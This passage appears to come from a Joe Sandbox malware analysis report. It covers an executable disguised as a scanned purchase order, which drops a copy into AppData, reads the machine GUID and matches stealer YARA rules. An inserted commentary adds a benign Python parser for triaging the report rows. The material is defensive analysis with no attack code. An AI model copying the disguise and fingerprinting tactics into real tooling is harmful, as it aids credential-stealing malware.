                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
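The rows above are the report's behavior table flattened to text: the source process is fused to the action, and many rows end in the link text "Jump to behavior". Almost all of them are the sample enumerating C:\Windows\Fonts, which is what a .NET process that initializes System.Drawing (listed among the assemblies both the sample and the dropped copy query) typically produces and is not, by itself, a malicious indicator. The rows a triager does want are the ones that are easy to lose in that noise: the dropped copy HJnkiZjAPsec.exe in %AppData%\Roaming querying its own image, and the read of HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid, a stable per-installation identifier that stealer and keylogger families commonly fold into a victim ID. The Python below is an added editor's example, not part of the Joe Sandbox report: it parses rows in exactly that shape and separates the font-directory noise from those findings. The sample rows are constructed copies of seven entries from this section; the row regex and the noise/finding classification are this example's own choices.

```python
"""Triage helper for Joe Sandbox 'Queries volume information' / 'Key value
queried' behavior rows as they appear once extracted to plain text (source
path fused to the action, optional trailing 'Jump to behavior' link text)."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample: seven rows copied in the shape of the entries above.
# The real report has well over a hundred font rows; two stand in for them.
SAMPLE_ROWS = r"""
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
"""

LINK_TEXT = "Jump to behavior"
# The first '.exe' closes the source path; the action name follows with no separator.
ROW_RE = re.compile(
    r"^Source:\s*(?P<source>.+?\.exe)"
    r"(?P<action>Queries volume information|Key value queried):\s*"
    r"(?P<rest>.+)$"
)
FONT_DIR = "c:\\windows\\fonts\\"   # GDI+/System.Drawing enumeration noise lives here


@dataclass(frozen=True)
class Row:
    source: str   # process image that performed the action
    action: str   # 'Queries volume information' or 'Key value queried'
    target: str   # file path or registry key
    detail: str   # last column: 'VolumeInformation' or the registry value name


def parse_row(line):
    """Return a Row for one behavior line, or None if the line is not one."""
    line = line.strip()
    if line.endswith(LINK_TEXT):
        line = line[: -len(LINK_TEXT)].rstrip()
    m = ROW_RE.match(line)
    if not m:
        return None
    # The target itself may contain spaces (the sample's file name does), so
    # only the final whitespace-separated token is the detail column.
    target, detail = m.group("rest").rsplit(None, 1)
    return Row(m.group("source"), m.group("action"), target, detail)


def parse_rows(text):
    return [r for r in (parse_row(ln) for ln in text.splitlines()) if r is not None]


def triage(rows):
    """Per source process: count font-directory noise, keep every other target,
    and flag two findings worth a second look (self-query, MachineGuid read)."""
    summary = defaultdict(lambda: {"font_queries": 0, "other_targets": [],
                                   "self_query": False, "machine_guid": False})
    for r in rows:
        rec = summary[r.source]
        if r.action == "Queries volume information":
            if r.target.lower().startswith(FONT_DIR):
                rec["font_queries"] += 1
            else:
                rec["other_targets"].append(r.target)
            if r.target.lower() == r.source.lower():
                rec["self_query"] = True       # process inspecting its own image
        elif r.action == "Key value queried" and r.detail == "MachineGuid":
            rec["machine_guid"] = True         # stable host ID, common victim-ID source
    return dict(summary)


if __name__ == "__main__":
    for src, rec in triage(parse_rows(SAMPLE_ROWS)).items():
        print(src, rec)
```

Run against the full report text, the same two functions reduce the hundred-odd font rows to one counter per process and leave the short list of targets that actually distinguishes the sample from a benign WinForms application.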

                  Stealing of Sensitive Information

                  Source: Yara match File source: 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 8.2.HJnkiZjAPsec.exe.47369f0.3.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 8.2.HJnkiZjAPsec.exe.4779410.2.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4cf2330.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 8.2.HJnkiZjAPsec.exe.4779410.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 8.2.HJnkiZjAPsec.exe.47369f0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe PID: 5824, type: MEMORYSTR
